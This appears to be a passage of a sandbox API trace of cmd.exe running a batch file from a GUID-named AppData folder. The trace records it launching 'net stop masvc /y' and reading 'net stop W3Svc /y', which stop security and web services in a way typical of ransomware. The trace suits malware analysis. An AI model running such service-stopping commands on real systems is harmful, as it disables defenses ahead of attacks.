0x3e0000 [0206.768] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0206.768] GetProcessHeap () returned 0x3e0000 [0206.768] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0206.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0206.769] GetProcessHeap () returned 0x3e0000 [0206.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0206.770] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x26) returned 0x3ef4b0 [0206.772] _tell (_FileHandle=3) returned 4186 [0206.772] _close (_FileHandle=3) returned 0 [0206.772] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0206.772] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0206.772] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0206.772] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0206.772] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0206.773] _wcsicmp (_String1="net", _String2="CD") returned 11 [0206.773] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0206.773] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0206.773] _wcsicmp (_String1="net", _String2="REN") returned -4 [0206.773] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0206.773] _wcsicmp (_String1="net", _String2="SET") returned -5 [0206.773] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0206.773] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0206.773] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0206.773] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0206.773] _wcsicmp (_String1="net", _String2="MD") returned 1 [0206.773] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0206.773] _wcsicmp (_String1="net", _String2="RD") returned -4 [0206.773] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0206.773] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0206.773] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0206.773] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0206.773] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0206.773] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0206.773] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0206.773] _wcsicmp (_String1="net", _String2="VER") returned -8 [0206.773] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0206.773] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0206.773] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0206.773] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0206.773] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0206.773] _wcsicmp (_String1="net", _String2="START") returned -5 [0206.773] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0206.773] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0206.773] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0206.773] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0206.773] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0206.773] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0206.773] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0206.773] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0206.773] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0206.773] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0206.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0206.774] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0206.774] SetErrorMode (uMode=0x0) returned 0x1 [0206.774] GetProcessHeap () returned 0x3e0000 [0206.774] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0206.774] GetProcessHeap () returned 0x3e0000 [0206.774] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0206.775] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.775] GetProcessHeap () returned 0x3e0000 [0206.775] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0206.775] GetProcessHeap () returned 0x3e0000 [0206.775] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0206.775] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0206.775] GetProcessHeap () returned 0x3e0000 [0206.775] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0206.775] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.775] GetProcessHeap () returned 0x3e0000 [0206.775] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0206.776] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0206.776] GetProcessHeap () returned 0x3e0000 [0206.776] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0206.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.777] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.777] GetLastError () returned 0x2 [0206.777] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.777] GetLastError () returned 0x2 [0206.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.778] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.778] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.779] GetLastError () returned 0x2 [0206.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.779] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.780] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f4ba8 [0206.780] GetProcessHeap () returned 0x3e0000 [0206.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2e) returned 0x3e1290 [0206.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6e88 [0206.781] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0206.781] SetErrorMode (uMode=0x0) returned 0x1 [0206.781] GetProcessHeap () returned 0x3e0000 [0206.781] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0206.781] GetProcessHeap () returned 0x3e0000 [0206.781] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0206.782] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.782] GetProcessHeap () returned 0x3e0000 [0206.782] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0206.782] GetProcessHeap () returned 0x3e0000 [0206.782] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0206.782] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0206.782] GetProcessHeap () returned 0x3e0000 [0206.782] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0206.782] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.782] GetProcessHeap () returned 0x3e0000 [0206.782] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0206.783] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0206.783] GetProcessHeap () returned 0x3e0000 [0206.783] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0206.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.783] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.783] GetLastError () returned 0x2 [0206.784] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.784] GetLastError () returned 0x2 [0206.784] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.785] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0206.785] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.785] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.785] GetLastError () returned 0x2 [0206.786] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0206.786] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.786] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.786] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0206.786] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0206.787] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0206.787] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4298 [0206.787] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.787] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop masvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop masvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop masvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x840, dwThreadId=0x86c)) returned 1 [0206.792] CloseHandle (hObject=0x78) returned 1 [0206.792] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.792] GetProcessHeap () returned 0x3e0000 [0206.792] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.792] GetEnvironmentStringsW () returned 0x3f8408* [0206.792] GetProcessHeap () returned 0x3e0000 [0206.792] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.792] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.792] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0206.933] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0206.933] CloseHandle (hObject=0x74) returned 1 [0206.933] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0206.933] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0206.933] GetProcessHeap () returned 0x3e0000 [0206.933] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.933] GetEnvironmentStringsW () returned 0x3f8408* [0206.933] GetProcessHeap () returned 0x3e0000 [0206.933] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.934] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.934] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.934] GetProcessHeap () returned 0x3e0000 [0206.934] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.934] GetEnvironmentStringsW () returned 0x3f8408* [0206.934] GetProcessHeap () returned 0x3e0000 [0206.934] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.934] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.934] GetProcessHeap () returned 0x3e0000 [0206.934] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0206.934] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0206.934] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.934] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0206.934] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.934] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0206.934] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.934] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0206.935] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.935] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0206.935] SetConsoleInputExeNameW () returned 0x1 [0206.935] GetConsoleOutputCP () returned 0x1b5 [0206.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0206.935] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0206.936] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0206.936] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.936] SetFilePointer (in: hFile=0x74, lDistanceToMove=4186, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105a [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0206.936] GetProcessHeap () returned 0x3e0000 [0206.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0206.937] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.937] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105a [0206.937] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x867, lpOverlapped=0x0) returned 1 [0206.937] SetFilePointer (in: hFile=0x74, lDistanceToMove=4205, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x106d [0206.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop W3Svc /y\r\negrationSvc /y\r\n\n\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 19 [0206.937] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.937] GetFileType (hFile=0x74) returned 0x1 [0206.937] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.937] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x106d [0206.937] GetProcessHeap () returned 0x3e0000 [0206.937] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0206.937] GetProcessHeap () returned 0x3e0000 [0206.937] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0206.943] _tell (_FileHandle=3) returned 4205 [0206.943] _close (_FileHandle=3) returned 0 [0206.943] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0206.943] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0206.943] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0206.943] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0206.943] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0206.943] _wcsicmp (_String1="net", _String2="CD") returned 11 [0206.943] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0206.943] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0206.943] _wcsicmp (_String1="net", _String2="REN") returned -4 [0206.943] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0206.943] _wcsicmp (_String1="net", _String2="SET") returned -5 [0206.943] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0206.943] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0206.943] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0206.943] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0206.943] _wcsicmp (_String1="net", _String2="MD") returned 1 [0206.943] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0206.943] _wcsicmp (_String1="net", _String2="RD") returned -4 [0206.943] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0206.943] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0206.943] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0206.943] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0206.943] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0206.943] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0206.943] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0206.943] _wcsicmp (_String1="net", _String2="VER") returned -8 [0206.943] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0206.943] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0206.943] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0206.943] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0206.943] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0206.943] _wcsicmp (_String1="net", _String2="START") returned -5 [0206.944] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0206.944] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0206.944] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0206.944] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0206.944] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0206.944] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0206.944] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0206.944] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0206.944] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0206.944] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0206.944] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0206.944] SetErrorMode (uMode=0x0) returned 0x1 [0206.944] GetProcessHeap () returned 0x3e0000 [0206.944] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0206.944] GetProcessHeap () returned 0x3e0000 [0206.944] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0206.945] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.945] GetProcessHeap () returned 0x3e0000 [0206.945] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0206.945] GetProcessHeap () returned 0x3e0000 [0206.945] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0206.945] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0206.945] GetProcessHeap () returned 0x3e0000 [0206.945] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0206.945] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.945] GetProcessHeap () returned 0x3e0000 [0206.945] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0206.946] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0206.946] GetProcessHeap () returned 0x3e0000 [0206.946] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0206.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.946] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.946] GetLastError () returned 0x2 [0206.947] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.947] GetLastError () returned 0x2 [0206.947] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.948] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.948] GetLastError 